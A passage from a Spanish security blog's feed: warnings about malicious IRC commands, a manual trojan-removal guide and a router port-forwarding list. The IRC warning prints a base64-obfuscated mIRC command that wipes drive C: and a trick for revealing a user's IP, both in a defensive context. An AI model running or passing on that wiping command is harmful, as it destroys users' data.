/&gt;&lt;br /&gt;-Con borrar ése archivo, cerrar el script y volverlo a abrir estaremos limpios otra vez.&lt;br /&gt;&lt;br /&gt;//say $ip -= Dime tu ip =-&lt;br /&gt;&lt;br /&gt;-Escribiendo éste comando&lt;br /&gt;&lt;br /&gt;//say $ip&lt;br /&gt;&lt;br /&gt;Darás tu ip a todo el canal donde lo escribas&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;**** Deltree **** -= Formateo de disco =-&lt;br /&gt;&lt;br /&gt;-ATENCIÓN: MUY PELIGROSO&lt;br /&gt;&lt;br /&gt;- Este comando funciona en windows 95 y 98. Al introducirlo hace una ejecución de ciertos archivos del sistema que originan algo similar a un format c: (nos borra el disco duro!!!).&lt;br /&gt;&lt;br /&gt;//$decode(L3J1biAtbiBcd2lvZG93c1xjb21tYW5kXGR1bHRyZXhlIC95IGM6XC4gPm51bA==,m)&lt;br /&gt;&lt;br /&gt;-¿Cómo evitarlo?&lt;br /&gt;&lt;br /&gt;Una vez más NO ESCRIBIENDO JAMÁS NINGÚN COMANDO QUE NO CONOZCAMOS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;**** F4 **** -= ¡Que me caigo! =-&lt;br /&gt;&lt;br /&gt;-No se trata propiamente de un comando, pero es una de las “novatadas” más extendidas en los canales de irc con los usuarios inexpertos. Consiste en convencer a la víctima (diciéndole que conseguirá @ por ejemplo), de que pulse la tecla de función F4, lo que provoca su desconexión del irc.&lt;br /&gt;&lt;br /&gt;NOTA: TODOS LOS COMANDOS AQUI PRESENTES HAN SIDO PROBADOS EN EL SCRIPT IRCAP&lt;br /&gt;&lt;br /&gt;LAS VERSIONES ACTUALIZADAS AVISAN DE QUE LO QUE ESTAS PONIENDO ES POSIBLE QUE SEA UN COMANDO MALIGNO&lt;br /&gt;&lt;br /&gt;PARA EL MIRC 6.01 NO FUNCIONA NINGUN COMANDO, SOLO SI VA ACOMPAÑADO DEL IRCAP Y COMO DIJE ANTES, AVISA DE ELLO SI ES UNA VERSION ACTUAL.&lt;br /&gt;&lt;br /&gt;LA MAYORIA DE COMANDOS NO FUNCIONAN EN LOS SCRIPTS ACTUALES ( ES IMPORTANTE ESTAR ACTUALIZADO )&lt;br /&gt;&lt;br /&gt;COMO PUEDEN AVERIGUAR NUESTRA IP&lt;br /&gt;&lt;br /&gt;-Debido a la implantación de las ip virtuales, resulta completamente imposible que puedan sacar nuestra ip mediante los métodos convencionales de los scripts. Pero debemos recordar que tanto los envíos de archivos, como aceptar archivos que nos envíen a nosotros mediante DCC, así como el DCC chat mostrarán nuestra ip a la persona que ha conectado con nosotros.&lt;br /&gt;&lt;br /&gt;-Si somos nosotros los que enviamos algo por DCC o ponemos el DCC chat, el envio junto con nuestra ip se reflejarán en la ventana estado.&lt;br /&gt;&lt;br /&gt;-Si nos mandan algo por DCC o aceptamos un DCC chat de alguien, ese alguien puede ver nuestra ip simplemente haciendo un netstat.&lt;br /&gt;&lt;br /&gt;-Si nos mandan visitar una página web que se encuentre en un servidor en un equipo “casero”, pueden loguear nuestra ip. Lo mismo sucederá si entramos en servidores de irc que sean inseguros o que no posean servicio de protección de ips (ips virtuales). Algunos de éstos servidores resultan, además, altamente peligrosos, pues pueden, incluso, obligarnos a visitar páginas web no deseadas que pueden tener contenidos peligrosos e, incluso, virus y troyanos (el navegador, en éste caso, se nos abre solo y va a la página que el administrador del servidor desee!!!)&lt;br /&gt;&lt;br /&gt;-Utilizando el comando “!seen” anteriormente visto.&lt;br /&gt;&lt;br /&gt;-Pidiéndonos que escribamos el comando //say $ip también visto anteriormente, o alguna de sus variantes.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-¿Cómo evitarlo?&lt;br /&gt;&lt;br /&gt;-No enviando ni aceptando archivos por DCC ni DCC chat de nicks que no conozcamos, y que no sean de nuestra absoluta confianza, y, aún en ése caso, asegurarnos bien que ése nick es la persona que nosotros creemos y no algún lamer que se ha puesto el nick de nuestro amigo. Para ello utilizaremos el comando:&lt;br /&gt;&lt;br /&gt;/msg nick status nick_de_nuestro_amigo&lt;br /&gt;&lt;br /&gt;Sólo si nos responde&lt;br /&gt;&lt;br /&gt;&lt;nick&gt; STATUS nick_de_nuestro_amigo 3 (Identificado)&lt;br /&gt;&lt;br /&gt;podremos estar seguros de que efectivamente ésa persona es quien nosotros creemos.&lt;br /&gt;&lt;br /&gt;-No visitar páginas. web de personas q no sean de confianza (si estas páginas están en servidores propios), porque cuando accedes al server se loguea tu ip.&lt;br /&gt;&lt;br /&gt;-No entrando en servidores de irc inseguros, que no tengan servicio de ips virtuales, servidores de "amiguetes" y, mucho menos aún, si nos dice alguien que no sea de nuestra total confianza "oye he montado un servidor de irc, entra a verlo". no olvidemos que los administradores de los servidores de irc pueden ver nuestra ip real.&lt;br /&gt;&lt;br /&gt;-Desactivando el comando !seen en nuestro script.&lt;/nick&gt;&lt;/tunick&gt;&lt;/tunick&gt;&lt;/tunick&gt;&lt;/tunick&gt;&lt;/tunick&gt;&lt;/tunick&gt;&lt;/tunick&gt;&lt;/tunick&gt;&lt;/tunick&gt;&lt;/tunick&gt;&lt;/tunick&gt;&lt;/tunick&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-2257170650132153536?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/2257170650132153536/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/comandos-peligrosos.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2257170650132153536'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2257170650132153536'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/comandos-peligrosos.html' title='COMANDOS PELIGROSOS:'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-2295732582067198247</id><published>2009-11-11T14:02:00.000+01:00</published><updated>2009-11-11T14:05:05.303+01:00</updated><title type='text'>Cómo quitar manualmente el troyano de un sistema infectado</title><content type='html'>&lt;span style="font-size:85%;"&gt;&lt;b&gt;1.&lt;/b&gt; Con el REGEDIT (Inicio, Ejecutar, REGEDIT y Enter) localice las siguientes ramas:                   &lt;/span&gt;                                      &lt;blockquote&gt;                     &lt;p&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;  HKEY_LOCAL_MACHINE&lt;br /&gt; Software&lt;br /&gt; Microsoft&lt;br /&gt; Windows&lt;br /&gt; CurrentVersion&lt;br /&gt; Run                   &lt;/span&gt;                     &lt;/p&gt;                   &lt;/blockquote&gt;                   &lt;p&gt;&lt;span style="font-size:85%;"&gt;y                   &lt;/span&gt;                   &lt;/p&gt;                   &lt;blockquote&gt;                     &lt;p&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;  HKEY_LOCAL_MACHINE&lt;br /&gt; Software&lt;br /&gt; Microsoft&lt;br /&gt; Windows&lt;br /&gt; CurrentVersion&lt;br /&gt; RunServices                   &lt;/span&gt;                     &lt;/p&gt;                   &lt;/blockquote&gt;                   &lt;p&gt;&lt;span style="font-size:85%;"&gt;Borre la carpeta "&lt;b&gt;RunDLL32r&lt;/b&gt;" si aparece en alguna de las dos ramas mencionadas.&lt;br /&gt;               &lt;br /&gt;                 &lt;b&gt;                   2.&lt;/b&gt; Con el REGEDIT localice las siguientes ramas:                   &lt;/span&gt;                   &lt;/p&gt;                   &lt;blockquote&gt;                     &lt;p&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;  HKEY_LOCAL_MACHINE&lt;br /&gt; Software&lt;br /&gt; Microsoft&lt;br /&gt; Active Setup&lt;br /&gt; Installed Components                   &lt;/span&gt;                     &lt;/p&gt;                   &lt;/blockquote&gt;                   &lt;p&gt;&lt;span style="font-size:85%;"&gt;Borre las entradas "&lt;b&gt;%random&lt;/b&gt;" y                   "&lt;b&gt;name%&lt;/b&gt;" si aparecen allí&lt;br /&gt;               &lt;br /&gt;                 &lt;b&gt;                   3.&lt;/b&gt; Con el REGEDIT localice la siguiente rama:                   &lt;/span&gt;                   &lt;/p&gt;                   &lt;blockquote&gt;                     &lt;p&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;  HKEY_LOCAL_MACHINE&lt;br /&gt; Software&lt;br /&gt; Microsoft&lt;br /&gt; Windows&lt;br /&gt; Currentversion&lt;br /&gt; explorer&lt;br /&gt; User shell folders                   &lt;/span&gt;                     &lt;/p&gt;                   &lt;/blockquote&gt;                   &lt;p&gt;&lt;span style="font-size:85%;"&gt;Borre la entrada "&lt;b&gt;Common Startup&lt;/b&gt;" en la ventana de la derecha&lt;br /&gt;               &lt;br /&gt;                 &lt;b&gt;                   4.&lt;/b&gt; Desde Inicio, Ejecutar, teclee &lt;b&gt; SYSTEM.INI&lt;/b&gt; (más Enter), y modifique la siguiente entrada (nombre_servidor puede ser cualquier nombre dado al servidor del troyano):                   &lt;/span&gt;                   &lt;/p&gt;                   &lt;blockquote&gt;                     &lt;p&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;  [boot]&lt;br /&gt; shell=Explorer.exe c:\windows\system\nombre_servidor.exe                   &lt;/span&gt;                     &lt;/p&gt;                   &lt;/blockquote&gt;                   &lt;p&gt;&lt;span style="font-size:85%;"&gt;Cámbiela por la siguiente:                   &lt;/span&gt;                   &lt;/p&gt;                   &lt;blockquote&gt;                     &lt;p&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;  [boot]&lt;br /&gt; shell=Explorer.exe                   &lt;/span&gt;                     &lt;/p&gt;                   &lt;/blockquote&gt;                   &lt;p&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;5.&lt;/b&gt; Desde Inicio, Ejecutar, teclee &lt;b&gt; WIN.INI&lt;/b&gt; (más Enter), y modifique la siguiente entrada:                   &lt;/span&gt;                   &lt;/p&gt;                   &lt;blockquote&gt;                     &lt;p&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;  [Windows]&lt;br /&gt; load=c:\windows\system\nombre_servidor.exe                   &lt;/span&gt;                     &lt;/p&gt;                   &lt;/blockquote&gt;                   &lt;p&gt;&lt;span style="font-size:85%;"&gt;Cambiándola por la siguiente:                   &lt;/span&gt;                   &lt;/p&gt;                   &lt;blockquote&gt;                     &lt;p&gt;&lt;span style=";font-family:Arial;font-size:85%;"  &gt;  [windows]&lt;br /&gt; load=                   &lt;/span&gt;                     &lt;/p&gt;                   &lt;/blockquote&gt;                   &lt;p&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;6.&lt;/b&gt; Borre el archivo &lt;b&gt; C:\EXPLORER.EXE&lt;/b&gt;&lt;br /&gt;               &lt;br /&gt;                 &lt;b&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;                   Importante:&lt;/span&gt;&lt;/b&gt; No confunda &lt;b&gt;C:\EXPLORER.EXE&lt;/b&gt; con &lt;b&gt;C:\WINDOWS\EXPLORER.EXE&lt;/b&gt;                   que es el Explorador de Windows.&lt;br /&gt;               &lt;br /&gt;                 &lt;b&gt;                   7.&lt;/b&gt; Reinicie la computadora&lt;br /&gt;               &lt;br /&gt;                 &lt;b&gt;                   8.&lt;/b&gt; Borre el archivo del troyano, ("&lt;b&gt;nombre_servidor.exe&lt;/b&gt;", donde "nombre_servidor" puede ser cualquier nombre dado al servidor), de la carpeta                   &lt;b&gt; C:\WINDOWS\SYSTEM&lt;/b&gt;&lt;br /&gt;               &lt;br /&gt;               &lt;br /&gt;                 &lt;i&gt;Fuentes: Dark Eclipse, Panda&lt;/i&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-2295732582067198247?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/2295732582067198247/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/como-quitar-manualmente-el-troyano-de.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2295732582067198247'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2295732582067198247'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/como-quitar-manualmente-el-troyano-de.html' title='Cómo quitar manualmente el troyano de un sistema infectado'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-5843544198203340198</id><published>2009-11-09T12:36:00.000+01:00</published><updated>2009-11-09T13:02:43.030+01:00</updated><title type='text'>Abrir Puertos</title><content type='html'>Bueno este post esta claro,como abrir los puertos para tus juegos o programas p2p,emule,bitcoment,utorrent,ect...............................&lt;br /&gt;&lt;br /&gt;Primero debeis poner ipconfig para sacar vuestra puerta de enlace&lt;br /&gt;&lt;br /&gt;ejecutar &gt; cmd &gt;ipconfig&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mFMUaCwtbag/SvgCaj2He7I/AAAAAAAAAC8/F66tobs6hBM/s1600-h/Dibujo.bmp"&gt;&lt;img style="cursor: pointer; width: 320px; height: 167px;" src="http://4.bp.blogspot.com/_mFMUaCwtbag/SvgCaj2He7I/AAAAAAAAAC8/F66tobs6hBM/s320/Dibujo.bmp" alt="" id="BLOGGER_PHOTO_ID_5402070408352988082" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;despues entrar en el explorador y pones tu puerta de enlace y os pediran el login y la contraseña&lt;br /&gt;poner la vuestra (suelen ser standar 1234,1234) y ya estais dentro del router&lt;br /&gt;&lt;br /&gt;Aqui teneis los router hay 77 si teneis alguna duda dejar comentario o mandar MP&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;3COM&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;-----------------------&lt;br /&gt;&lt;br /&gt;- 3Com 812 ____________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/3com812.html"&gt;http://www.adslzone.net/3com812.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- 3Com 11 G Wireless ____ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/3com11g.html"&gt;http://www.adslzone.net/3com11g.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- 3Com 3CRWDR100Y72 __ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/3Com3CRWDR100Y72.html"&gt;http://www.adslzone.net/3Com3CRWDR100Y72.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;=================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;ALCATEL&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;-----------------------&lt;br /&gt;&lt;br /&gt;- Alcatel Speed Touch ____ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/alcatel.html"&gt;http://www.adslzone.net/alcatel.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;=================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;BELKIN&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;------------------------&lt;br /&gt;&lt;br /&gt;- Belkin 802.11B __________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/belkin802-11b.html"&gt;http://www.adslzone.net/belkin802-11b.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Belkin 802.11G __________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/belkin802-11g.html"&gt;http://www.adslzone.net/belkin802-11g.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;==================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;BENQ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;-------------------------&lt;br /&gt;&lt;br /&gt;- Benq ESG 103 ___________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/benq.htm"&gt;http://www.adslzone.net/benq.htm&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;==================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;CISCO SYSTEMS&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;-------------------------&lt;br /&gt;&lt;br /&gt;- Cisco 827 _______________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/cisco827.html"&gt;http://www.adslzone.net/cisco827.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;===================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;CNET&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;-------------------------&lt;br /&gt;&lt;br /&gt;- CNet CAR-854 ____________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/cnetcar.html"&gt;http://www.adslzone.net/cnetcar.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- CNet CWR-854 ____________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/cnetcwr.html"&gt;http://www.adslzone.net/cnetcwr.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;====================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;COMTREND&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;-------------------------&lt;br /&gt;&lt;br /&gt;- Comtrend 500 _____________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/comtrend500.html"&gt;http://www.adslzone.net/comtrend500.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Comtrend 535 _____________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/comtrend535.html"&gt;http://www.adslzone.net/comtrend535.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Comtrend 536+ ____________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/comtrend536.html"&gt;http://www.adslzone.net/comtrend536.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Comtrend 561 _____________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/comtrend561.html"&gt;http://www.adslzone.net/comtrend561.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Comtrend 5071 ____________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/comtrend5071.html"&gt;http://www.adslzone.net/comtrend5071.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;=====================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;CONCEPTRONIC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;--------------------------&lt;br /&gt;&lt;br /&gt;- Conceptronic C54APRA ______ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/conceptronicC54APRA.html"&gt;http://www.adslzone.net/conceptronicC54APRA.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Conceptronic CADSLR4 ______ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/conceptronicCADSLR4.html"&gt;http://www.adslzone.net/conceptronicCADSLR4.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Conceptronic C54BRS4 ______ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/conceptronicC54BRS4.html"&gt;http://www.adslzone.net/conceptronicC54BRS4.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Concept. C54APRA2+ _______ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/conceptronic-C54APRA2+.html"&gt;http://www.adslzone.net/conceptronic-C54APRA2+.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;CONEXANT&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;---------------------------&lt;br /&gt;&lt;br /&gt;- Conexant CX82310 __________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/conexant.html"&gt;http://www.adslzone.net/conexant.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;======================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;CONNECTION N&amp;amp;C&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;---------------------------&lt;br /&gt;&lt;br /&gt;- N&amp;amp;C RWGD45 _______________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/nc.html"&gt;http://www.adslzone.net/nc.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;=======================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;D-LINK&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;---------------------------&lt;br /&gt;&lt;br /&gt;- D-Link 500 __________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/d-link500.html"&gt;http://www.adslzone.net/d-link500.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- D-Link 504G _________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/d-link504g.html"&gt;http://www.adslzone.net/d-link504g.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- D-Link 504T _________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/d-link504t.html"&gt;http://www.adslzone.net/d-link504t.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- D-Link 524T _________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/d-link524t.html"&gt;http://www.adslzone.net/d-link524t.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- D-Link G604T ________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/d-linkg604t.html"&gt;http://www.adslzone.net/d-linkg604t.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- D-Link 614 __________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/d-link614.html"&gt;http://www.adslzone.net/d-link614.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- D-Link 624 __________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/d-link624.html"&gt;http://www.adslzone.net/d-link624.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- D-Link G624T ________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/D-Link_DSL-G624T.html"&gt;http://www.adslzone.net/D-Link_DSL-G624T.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;HUAWEI&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;---------------------------&lt;br /&gt;&lt;br /&gt;- Huawei SmartAX MT882 ________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/huawei.html"&gt;http://www.adslzone.net/huawei.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Huawei HG520 ________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/huaweiHG520.html"&gt;http://www.adslzone.net/huaweiHG520.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- H. Echolife HG520V ____________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/huawei-echolife-hg520v-para-ftth-o-vdsl2.html"&gt;http://www.adslzone.net/huawei-echolife ... vdsl2.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;=========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;INVENTEL&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;---------------------------&lt;br /&gt;&lt;br /&gt;- Inventel DW-B-200 ____________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/inventel.html"&gt;http://www.adslzone.net/inventel.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;=========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;LINKSYS&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;---------------------------&lt;br /&gt;&lt;br /&gt;- Linksys BEFSR41 _______________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/linksys-befsr41.html"&gt;http://www.adslzone.net/linksys-befsr41.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Linksys WAG54G _______________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/linksys-wag.html"&gt;http://www.adslzone.net/linksys-wag.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Linksys WAG354G ______________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/linksys-WAG354G.html"&gt;http://www.adslzone.net/linksys-WAG354G.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Linksys WRT54G _______________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/linksys-wrt.html"&gt;http://www.adslzone.net/linksys-wrt.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Linksys AG241 _________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/linksys-ag241.html"&gt;http://www.adslzone.net/linksys-ag241.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;=========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;NETGEAR&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- Netgear DG834G ________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/netgearDG834G.html"&gt;http://www.adslzone.net/netgearDG834G.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;=========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;NOKIA&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- Nokia M1112 ____________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/nokia.html"&gt;http://www.adslzone.net/nokia.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;=========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;OVISLINK&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- 